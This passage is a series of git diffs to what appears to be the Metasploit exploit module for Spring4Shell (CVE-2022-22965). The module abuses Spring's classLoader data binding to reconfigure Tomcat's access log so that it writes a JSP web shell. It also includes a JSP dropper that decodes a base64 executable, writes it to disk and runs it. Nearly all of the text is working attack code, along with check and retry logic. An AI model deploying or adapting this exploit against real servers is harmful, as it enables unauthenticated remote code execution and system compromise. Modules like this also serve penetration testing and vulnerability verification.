+      'uri'     => normalize_uri(target_uri.path.to_s),
+      'version' => '1.1',
+      'method'  => 'POST',
+      'headers' => {
+        "c1" => "<%", # %{c1}i replacement in payload
+        "c2" => "%>", # %{c2}i replacement in payload
+      },
+      'vars_post' => {
+        "#{cl_prefix}.resources.context.parent.pipeline.first.pattern"        => opts[:payload],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.directory"      => opts[:directory],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.prefix"         => opts[:prefix],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.suffix"         => opts[:suffix],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
+      }
+    })
+
+    res
+  end
+
+  def check_log_file(hint)
+    uri = normalize_uri("/", @jsp_file)
+
+    print_status("#{peer} - Waiting for the server to flush the logfile")
+
+    10.times do |x|
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger payload
+      vprint_status("#{peer} - Countdown #{10-x}...")
+      res = dump_line(uri)
+
+      # Failure. The request timed out or the server went away.
+      fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?
+
+      # Success if the server has flushed all the sent commands to the jsp file
+      if res.code == 200
+        print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}")
+        return true
+      end
+    end
+
+    false
+  end
+
+  # Fix the JSP payload to make it valid once is dropped
+  # to the log file
+  def fix(jsp)
+    output = ""
+    jsp.each_line do |l|
+      if l =~ /<%.*%>/
+        output << l
+      elsif l =~ /<%/
+        next
+      elsif l.chomp.empty?
+        next
+      else
+        output << "<% #{l.chomp} %>"
+      end
+    end
+    output
+  end
+
+  def create_jsp
+    if target['Arch'] == ARCH_JAVA
+      jsp = fix(payload.encoded)
+    else
+      payload_exe = generate_payload_exe
+      payload_file = rand_text_alphanumeric(4 + rand(4))
+      payload_dir = datastore['FILEDROPPERDIR']
+
+      jsp = jsp_dropper(payload_dir + payload_file, payload_exe)
+      register_files_for_cleanup(payload_dir + payload_file)
+    end
+
+    jsp
+  end
+
+  def check
+    prefix_jsp = rand_text_alphanumeric(3+rand(3))
+    date_format = rand_text_numeric(1+rand(4))
+    @jsp_file = prefix_jsp + date_format + ".jsp"
+
+    status = CheckCode::Safe
+
+    # Prepare the JSP
+    print_status("#{peer} - Generating JSP...")
+    
+    # Modify the Class Loader
+    print_status("#{peer} - Modifying Class Loader...")
+    properties = {
+      :payload        => prefix_jsp,
+      :directory      => 'webapps/ROOT',
+      :prefix         => prefix_jsp,
+      :suffix         => '.jsp',
+      :file_date_format => date_format
+    }
+    res = modify_class_loader(properties)
+    unless res
+      fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
+    end
+
+    # No matter what happened, try to 'restore' the Class Loader
+    properties = {
+        :payload        => '',
+        :directory      => '',
+        :prefix         => '',
+        :suffix         => '',
+        :file_date_format => ''
+    }
+    modify_class_loader(properties)
+
+    # Check if the log file exists and has been flushed
+    if check_log_file(normalize_uri(target_uri.to_s))
+      register_files_for_cleanup(@jsp_file)
+      status = CheckCode::Vulnerable
+    else
+      fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
+    end
+
+    return status
+  end
+
+
+  def exploit
+    prefix_jsp = rand_text_alphanumeric(3+rand(3))
+    date_format = rand_text_numeric(1+rand(4))
+    @jsp_file = prefix_jsp + date_format + ".jsp"
+
+    # Prepare the JSP
+    print_status("#{peer} - Generating JSP...")
+    jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')
+    
+    # Modify the Class Loader
+    print_status("#{peer} - Modifying Class Loader...")
+    properties = {
+      :payload        => jsp,
+      :directory      => 'webapps/ROOT',
+      :prefix         => prefix_jsp,
+      :suffix         => '.jsp',
+      :file_date_format => date_format
+    }
+    res = modify_class_loader(properties)
+    unless res
+      fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
+    end
+
+    # No matter what happened, try to 'restore' the Class Loader
+    properties = {
+        :payload        => '',
+        :directory      => '',
+        :prefix         => '',
+        :suffix         => '',
+        :file_date_format => ''
+    }
+    modify_class_loader(properties)
+
+    # Check if the log file exists and has been flushed
+    if check_log_file(normalize_uri(target_uri.to_s))
+      register_files_for_cleanup(@jsp_file)
+    else
+      fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
+    end
+   
+  end
+
+end
+
+#  0day.today [2022-03-31]  #

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -261,6 +261,8 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
     end
 
+    sleep(1)
+
     # No matter what happened, try to 'restore' the Class Loader
     properties = {
       payload: '',
@@ -270,6 +272,8 @@ class MetasploitModule < Msf::Exploit::Remote
       file_date_format: ''
     }
     modify_class_loader(properties)
+
+    sleep(5)
 
     # Check if the log file exists and has been flushed
     if check_log_file(normalize_uri(target_uri.to_s))

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -12,124 +12,123 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Spring Framework Class property RCE (Spring4Shell)',
-      'Description'    => %q{
-        Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above 
-           and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable 
-           to remote code execution due to an unsafe data binding used to populate an object from request parameters 
-           to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the 
-           org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
-           class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can 
-           gain remote code execution.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Spring Framework Class property RCE (Spring4Shell)',
+        'Description' => %q{
+          Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above
+          and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable
+          to remote code execution due to an unsafe data binding used to populate an object from request parameters
+          to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the
+          org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
+          class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can
+          gain remote code execution.
+        },
+        'Author' => [
           'vleminator <vleminator[at]gmail.com>'
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           ['CVE', '2022-22965'],
           ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],
           ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],
           ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']
         ],
-      'Platform'       => %w{ linux win },
-      'Payload'        =>
-        {
+        'Platform' => %w[linux win],
+        'Payload' => {
           'Space' => 5000,
           'DisableNops' => true
         },
-      'Targets'        =>
-        [
-          ['Java',
-           {
-               'Arch'     => ARCH_JAVA,
-               'Platform' => %w{ linux win }
-           },
-          ],
-          ['Linux',
-           {
-               'Arch'     => [ARCH_X86, ARCH_X64],
-               'Platform' => 'linux'
-           }
-          ],
-          ['Windows',
+        'Targets' => [
+          [
+            'Java',
             {
-              'Arch'     => [ARCH_X86, ARCH_X64],
+              'Arch' => ARCH_JAVA,
+              'Platform' => %w[linux win]
+            },
+          ],
+          [
+            'Linux',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Windows',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
               'Platform' => 'win'
             }
           ]
         ],
-      'DisclosureDate' => 'Mar 31 2022',
-      'DefaultTarget'  => 0,
-      'Notes' => 
-        {
-          'AKA' => ['Spring4Shell', 'SpringShell']
-        }))
+        'DisclosureDate' => '2022-03-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['Spring4Shell', 'SpringShell'],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
 
-      register_options(
-        [
-          Opt::RPORT(8080),
-          OptString.new('TARGETURI', [ true, 'The path to the application action', "/app/example/HelloWorld.action"]),
-          OptString.new('FILEDROPPERDIR', [ false, 'The directory used for filedropper (only applicable to non-Java target)', "/tmp/"]),
-        ])
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),
+        OptString.new('FILEDROPPERDIR', [ false, 'The directory used for filedropper (only applicable to non-Java target)', '/tmp/']),
+      ]
+    )
   end
 
   def jsp_dropper(file, exe)
-    #
     # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.
-    #
-    dropper = <<-eos
-<%@ page import=\"java.io.FileOutputStream\" %>
-<%@ page import=\"java.util.Base64\" %>
-<%@ page import=\"java.io.File\" %>
-<% 
-  FileOutputStream oFile = new FileOutputStream(\"#{file}\", false);
-  oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\"));
-  oFile.flush();
-  oFile.close();
-  File f = new File(\"#{file}\");
-  f.setExecutable(true);
-  Runtime.getRuntime().exec(\"#{file}\"); 
-%>
-    eos
+    dropper = <<~EOS
+      <%@ page import=\"java.io.FileOutputStream\" %>
+      <%@ page import=\"java.util.Base64\" %>
+      <%@ page import=\"java.io.File\" %>
+      <%#{' '}
+        FileOutputStream oFile = new FileOutputStream(\"#{file}\", false);
+        oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\"));
+        oFile.flush();
+        oFile.close();
+        File f = new File(\"#{file}\");
+        f.setExecutable(true);
+        Runtime.getRuntime().exec(\"#{file}\");#{' '}
+      %>
+    EOS
 
     dropper
   end
 
-  def dump_line(uri, cmd = "")
+  def dump_line(uri, cmd = '')
     res = send_request_cgi({
-      'uri'     => uri+cmd,
+      'uri' => uri + cmd,
       'version' => '1.1',
-      'method'  => 'GET',
+      'method' => 'GET'
     })
 
     res
   end
 
   def modify_class_loader(opts)
-
-    cl_prefix = "class.module.classLoader"
-      # case datastore['STRUTS_VERSION']
-      # when '1.x' then "class.classLoader"
-      # when '2.x' then "class['classLoader']"
-      # end
+    cl_prefix = 'class.module.classLoader'
 
     res = send_request_cgi({
-      'uri'     => normalize_uri(target_uri.path.to_s),
+      'uri' => normalize_uri(target_uri.path.to_s),
       'version' => '1.1',
-      'method'  => 'POST',
+      'method' => 'POST',
       'headers' => {
-        "c1" => "<%", # %{c1}i replacement in payload
-        "c2" => "%>", # %{c2}i replacement in payload
+        'c1' => '<%', # %{c1}i replacement in payload
+        'c2' => '%>' # %{c2}i replacement in payload
       },
       'vars_post' => {
-        "#{cl_prefix}.resources.context.parent.pipeline.first.pattern"        => opts[:payload],
-        "#{cl_prefix}.resources.context.parent.pipeline.first.directory"      => opts[:directory],
-        "#{cl_prefix}.resources.context.parent.pipeline.first.prefix"         => opts[:prefix],
-        "#{cl_prefix}.resources.context.parent.pipeline.first.suffix"         => opts[:suffix],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],
         "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
       }
     })
@@ -137,8 +136,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res
   end
 
-  def check_log_file(hint)
-    uri = normalize_uri("/", @jsp_file)
+  def check_log_file(_hint)
+    uri = normalize_uri('/', @jsp_file)
 
     print_status("#{peer} - Waiting for the server to flush the logfile")
 
@@ -146,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
       select(nil, nil, nil, 2)
 
       # Now make a request to trigger payload
-      vprint_status("#{peer} - Countdown #{10-x}...")
+      vprint_status("#{peer} - Countdown #{10 - x}...")
       res = dump_line(uri)
 
       # Failure. The request timed out or the server went away.
@@ -165,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Fix the JSP payload to make it valid once is dropped
   # to the log file
   def fix(jsp)
-    output = ""
+    output = ''
     jsp.each_line do |l|
       if l =~ /<%.*%>/
         output << l
@@ -185,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
       jsp = fix(payload.encoded)
     else
       payload_exe = generate_payload_exe
-      payload_file = rand_text_alphanumeric(4 + rand(4))
+      payload_file = rand_text_alphanumeric(rand(4..7))
       payload_dir = datastore['FILEDROPPERDIR']
 
       jsp = jsp_dropper(payload_dir + payload_file, payload_exe)
@@ -198,19 +197,19 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     prefix_jsp = rand_text_alphanumeric(3..6)
     date_format = rand_text_numeric(1..5)
-    @jsp_file = prefix_jsp + date_format + ".jsp"
+    @jsp_file = prefix_jsp + date_format + '.jsp'
 
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
-    
+
     # Modify the Class Loader
     print_status("#{peer} - Modifying Class Loader...")
     properties = {
-      :payload        => prefix_jsp,
-      :directory      => 'webapps/ROOT',
-      :prefix         => prefix_jsp,
-      :suffix         => '.jsp',
-      :file_date_format => date_format
+      payload: prefix_jsp,
+      directory: 'webapps/ROOT',
+      prefix: prefix_jsp,
+      suffix: '.jsp',
+      file_date_format: date_format
     }
     res = modify_class_loader(properties)
     unless res
@@ -219,11 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # No matter what happened, try to 'restore' the Class Loader
     properties = {
-        :payload        => '',
-        :directory      => '',
-        :prefix         => '',
-        :suffix         => '',
-        :file_date_format => ''
+      payload: '',
+      directory: '',
+      prefix: '',
+      suffix: '',
+      file_date_format: ''
     }
     modify_class_loader(properties)
 
@@ -236,24 +235,26 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Safe
   end
 
-
   def exploit
-    prefix_jsp = rand_text_alphanumeric(3+rand(3))
-    date_format = rand_text_numeric(1+rand(4))
-    @jsp_file = prefix_jsp + date_format + ".jsp"
+    prefix_jsp = rand_text_alphanumeric(rand(3..5))
+    date_format = rand_text_numeric(rand(1..4))
+    @jsp_file = prefix_jsp + date_format + '.jsp'
 
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
+
+    # rubocop:disable  Style/FormatStringToken
     jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')
-    
+    # rubocop:enable  Style/FormatStringToken
+
     # Modify the Class Loader
     print_status("#{peer} - Modifying Class Loader...")
     properties = {
-      :payload        => jsp,
-      :directory      => 'webapps/ROOT',
-      :prefix         => prefix_jsp,
-      :suffix         => '.jsp',
-      :file_date_format => date_format
+      payload: jsp,
+      directory: 'webapps/ROOT',
+      prefix: prefix_jsp,
+      suffix: '.jsp',
+      file_date_format: date_format
     }
     res = modify_class_loader(properties)
     unless res
@@ -262,11 +263,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # No matter what happened, try to 'restore' the Class Loader
     properties = {
-        :payload        => '',
-        :directory      => '',
-        :prefix         => '',
-        :suffix         => '',
-        :file_date_format => ''
+      payload: '',
+      directory: '',
+      prefix: '',
+      suffix: '',
+      file_date_format: ''
     }
     modify_class_loader(properties)
 
@@ -276,7 +277,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
     end
-   
   end
 
 end

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -196,44 +196,42 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    prefix_jsp = rand_text_alphanumeric(3..6)
-    date_format = rand_text_numeric(1..5)
-    @jsp_file = prefix_jsp + date_format + '.jsp'
 
-    # Prepare the JSP
-    print_status("#{peer} - Generating JSP...")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))
+    )
 
-    # Modify the Class Loader
-    print_status("#{peer} - Modifying Class Loader...")
-    properties = {
-      payload: prefix_jsp,
-      directory: datastore['PAYLOAD_PATH'],
-      prefix: prefix_jsp,
-      suffix: '.jsp',
-      file_date_format: date_format
-    }
-    res = modify_class_loader(properties)
-    unless res
-      return CheckCode::Unknown
+    return CheckCode::Unknown('Web server seems unresponsive') unless res
+
+    if res.headers.key?('Server')
+      res.headers['Server'].match(%r{(.*)/([\d|.]+)$})
+    else
+      res.body.match(%r{Apache\s(.*)/([\d|.]+)})
     end
 
-    # No matter what happened, try to 'restore' the Class Loader
-    properties = {
-      payload: '',
-      directory: '',
-      prefix: '',
-      suffix: '',
-      file_date_format: ''
-    }
-    modify_class_loader(properties)
+    server = Regexp.last_match(1) || nil
+    version = Rex::Version.new(Regexp.last_match(2)) || nil
 
-    # Check if the log file exists and has been flushed
-    if check_log_file(normalize_uri(target_uri.to_s))
-      register_files_for_cleanup(@jsp_file)
-      return CheckCode::Vulnerable
-    end
+    return Exploit::CheckCode::Safe('Application seems not be running under Tomcat') unless server && server.match(/Tomcat/)
 
-    return CheckCode::Safe
+    vprint_status("Detected a #{server} #{version} running")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'data' => "class.module.classLoader.DefaultAssertionStatus=#{Rex::Text.rand_text_alpha_lower(4..6)}"
+    )
+
+    # setting the default assertion status to a valid status
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'data' => 'class.module.classLoader.DefaultAssertionStatus=true'
+    )    
+    return CheckCode::Safe unless res.code == 400
+
+    Exploit::CheckCode::Appears
   end
 
   def exploit

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -106,16 +106,6 @@ class MetasploitModule < Msf::Exploit::Remote
     dropper
   end
 
-  def dump_line(uri, cmd = '')
-    res = send_request_cgi({
-      'uri' => uri + cmd,
-      'version' => '1.1',
-      'method' => 'GET'
-    })
-
-    res
-  end
-
   def modify_class_loader(opts)
     cl_prefix = 'class.module.classLoader'
 
@@ -186,14 +176,19 @@ class MetasploitModule < Msf::Exploit::Remote
       jsp = fix(payload.encoded)
     else
       payload_exe = generate_payload_exe
-      payload_file = rand_text_alphanumeric(rand(4..7))
-      payload_dir = datastore['WritableDir']
+      payload_filename = rand_text_alphanumeric(rand(4..7))
 
-      jsp = jsp_dropper(payload_dir + payload_file, payload_exe)
-      register_files_for_cleanup(payload_dir + payload_file)
+      if target['Platform'] == 'win'
+        payload_path = datastore['WritableDir'] + '\\' +  payload_filename
+      else
+        payload_path = datastore['WritableDir'] + '/' + payload_filename
+      end
+
+      jsp = jsp_dropper(payload_path, payload_exe)
+      register_files_for_cleanup(payload_path)
     end
 
-    jsp
+    return jsp
   end
 
   def check

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -168,6 +168,8 @@ class MetasploitModule < Msf::Exploit::Remote
         output << l
       elsif l =~ /<%/
         next
+      elsif l =~ /%>/
+        next
       elsif l.chomp.empty?
         next
       else

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def modify_class_loader(opts)
     cl_prefix = 'class.module.classLoader'
 
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path.to_s),
       'version' => '1.1',
       'method' => 'POST',
@@ -125,28 +125,24 @@ class MetasploitModule < Msf::Exploit::Remote
         "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
       }
     })
-
-    sleep(10)
-
-    res
   end
 
   def check_log_file
-    jsp_uri = normalize_uri(datastore['PAYLOAD_PATH'], @jsp_file)
-
     print_status("#{peer} - Waiting for the server to flush the logfile")
-    sleep(50)
+    print_status("#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}")
 
-    print_status("#{peer} - Executing JSP payload")
-    vprint_status(full_uri(jsp_uri))
+    succeeded = retry_until_true(timeout: 60) do
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(@jsp_file)
+      })
 
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri("/#{@jsp_file}")
-    }, 5)
+      res&.code == 200 && !res.body.blank?
+    end
 
-    fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless res.code.to_i == 200
-    print_good("#{peer} - Log file flushed at #{jsp_uri}")
+    fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded
+
+    print_good("#{peer} - Log file flushed")
     register_files_for_cleanup(@jsp_file)
   end
 
@@ -187,7 +183,9 @@ class MetasploitModule < Msf::Exploit::Remote
       register_files_for_cleanup(payload_path)
     end
 
-    return jsp
+    # prefix the JSP with a random UUID so *something* is in the body of the
+    # response, allowing us to tell that the payload is running
+    return Faker::Internet.uuid + jsp
   end
 
   def check
@@ -268,5 +266,33 @@ class MetasploitModule < Msf::Exploit::Remote
     check_log_file
 
     handler
+  end
+
+  # Retry the block until it returns a truthy value. Each iteration attempt will
+  # be performed with expoential backoff. If the timeout period surpasses, false is returned.
+  def retry_until_true(timeout:)
+    start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)
+    ending_time = start_time + timeout
+    retry_count = 0
+    while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time
+      result = yield
+      return result if result
+
+      retry_count += 1
+      remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)
+      break if remaining_time_budget <= 0
+
+      delay = 2**retry_count
+      if delay >= remaining_time_budget
+        delay = remaining_time_budget
+        vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}")
+      else
+        vprint_status("Sleeping for #{delay} seconds before attempting again")
+      end
+
+      sleep delay
+    end
+
+    false
   end
 end

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -78,10 +78,12 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),
-        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),
-        OptString.new('FILEDROPPER_DIR', [ false, 'Path to write the filedropper (only applicable to non-Java targets)', '/tmp/']),
+        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT'])
       ]
     )
+    register_advanced_options [
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
   end
 
   def jsp_dropper(file, exe)
@@ -185,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       payload_exe = generate_payload_exe
       payload_file = rand_text_alphanumeric(rand(4..7))
-      payload_dir = datastore['FILEDROPPER_DIR']
+      payload_dir = datastore['WritableDir']
 
       jsp = jsp_dropper(payload_dir + payload_file, payload_exe)
       register_files_for_cleanup(payload_dir + payload_file)

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -143,7 +143,6 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded
 
     print_good("#{peer} - Log file flushed")
-    register_files_for_cleanup(@jsp_file)
   end
 
   # Fix the JSP payload to make it valid once is dropped
@@ -167,8 +166,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_jsp
+    jsp = <<~EOS
+      <%
+        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}");
+        jsp.delete();
+      %>
+      #{Faker::Internet.uuid}
+    EOS
     if target['Arch'] == ARCH_JAVA
-      jsp = fix(payload.encoded)
+      jsp << fix(payload.encoded)
     else
       payload_exe = generate_payload_exe
       payload_filename = rand_text_alphanumeric(rand(4..7))
@@ -179,13 +185,11 @@ class MetasploitModule < Msf::Exploit::Remote
         payload_path = datastore['WritableDir'] + '/' + payload_filename
       end
 
-      jsp = jsp_dropper(payload_path, payload_exe)
+      jsp << jsp_dropper(payload_path, payload_exe)
       register_files_for_cleanup(payload_path)
     end
 
-    # prefix the JSP with a random UUID so *something* is in the body of the
-    # response, allowing us to tell that the payload is running
-    return Faker::Internet.uuid + jsp
+    jsp
   end
 
   def check

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -126,17 +126,16 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    sleep(1)
+    sleep(10)
 
     res
   end
 
   def check_log_file
-
     jsp_uri = normalize_uri(datastore['PAYLOAD_PATH'], @jsp_file)
-    
+
     print_status("#{peer} - Waiting for the server to flush the logfile")
-    sleep(5)
+    sleep(50)
 
     print_status("#{peer} - Executing JSP payload")
     vprint_status(full_uri(jsp_uri))
@@ -145,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri("/#{@jsp_file}")
     }, 5)
-    
+
     fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless res.code.to_i == 200
     print_good("#{peer} - Log file flushed at #{jsp_uri}")
     register_files_for_cleanup(@jsp_file)
@@ -179,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
       payload_filename = rand_text_alphanumeric(rand(4..7))
 
       if target['Platform'] == 'win'
-        payload_path = datastore['WritableDir'] + '\\' +  payload_filename
+        payload_path = datastore['WritableDir'] + '\\' + payload_filename
       else
         payload_path = datastore['WritableDir'] + '/' + payload_filename
       end
@@ -192,7 +191,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))
@@ -209,9 +207,9 @@ class MetasploitModule < Msf::Exploit::Remote
     server = Regexp.last_match(1) || nil
     version = Rex::Version.new(Regexp.last_match(2)) || nil
 
-    return Exploit::CheckCode::Safe('Application seems not be running under Tomcat') unless server && server.match(/Tomcat/)
+    return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)
 
-    vprint_status("Detected a #{server} #{version} running")
+    vprint_status("Detected #{server} #{version} running")
 
     res = send_request_cgi(
       'method' => 'POST',
@@ -224,7 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI']),
       'data' => 'class.module.classLoader.DefaultAssertionStatus=true'
-    )    
+    )
     return CheckCode::Safe unless res.code == 400
 
     Exploit::CheckCode::Appears
@@ -234,7 +232,7 @@ class MetasploitModule < Msf::Exploit::Remote
     prefix_jsp = rand_text_alphanumeric(rand(3..5))
     date_format = rand_text_numeric(rand(1..4))
     @jsp_file = prefix_jsp + date_format + '.jsp'
-    
+
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
 
@@ -268,11 +266,7 @@ class MetasploitModule < Msf::Exploit::Remote
     modify_class_loader(properties)
 
     check_log_file
-    
+
     handler
-    
   end
-
 end
-
-#  0day.today [2022-03-31]  #

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -90,14 +90,14 @@ class MetasploitModule < Msf::Exploit::Remote
       <%@ page import=\"java.io.FileOutputStream\" %>
       <%@ page import=\"java.util.Base64\" %>
       <%@ page import=\"java.io.File\" %>
-      <%#{' '}
+      <%
         FileOutputStream oFile = new FileOutputStream(\"#{file}\", false);
         oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\"));
         oFile.flush();
         oFile.close();
         File f = new File(\"#{file}\");
         f.setExecutable(true);
-        Runtime.getRuntime().exec(\"#{file}\");#{' '}
+        Runtime.getRuntime().exec(\"#{file}\");
       %>
     EOS
 
@@ -134,32 +134,29 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
+    sleep(1)
+
     res
   end
 
-  def check_log_file(_hint)
-    uri = normalize_uri('/', @jsp_file)
+  def check_log_file
 
+    jsp_uri = normalize_uri(datastore['PAYLOAD_PATH'], @jsp_file)
+    
     print_status("#{peer} - Waiting for the server to flush the logfile")
+    sleep(5)
 
-    10.times do |x|
-      select(nil, nil, nil, 2)
+    print_status("#{peer} - Executing JSP payload")
+    vprint_status(full_uri(jsp_uri))
 
-      # Now make a request to trigger payload
-      vprint_status("#{peer} - Countdown #{10 - x}...")
-      res = dump_line(uri)
-
-      # Failure. The request timed out or the server went away.
-      fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?
-
-      # Success if the server has flushed all the sent commands to the jsp file
-      if res.code == 200
-        print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}")
-        return true
-      end
-    end
-
-    false
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri("/#{@jsp_file}")
+    }, 5)
+    
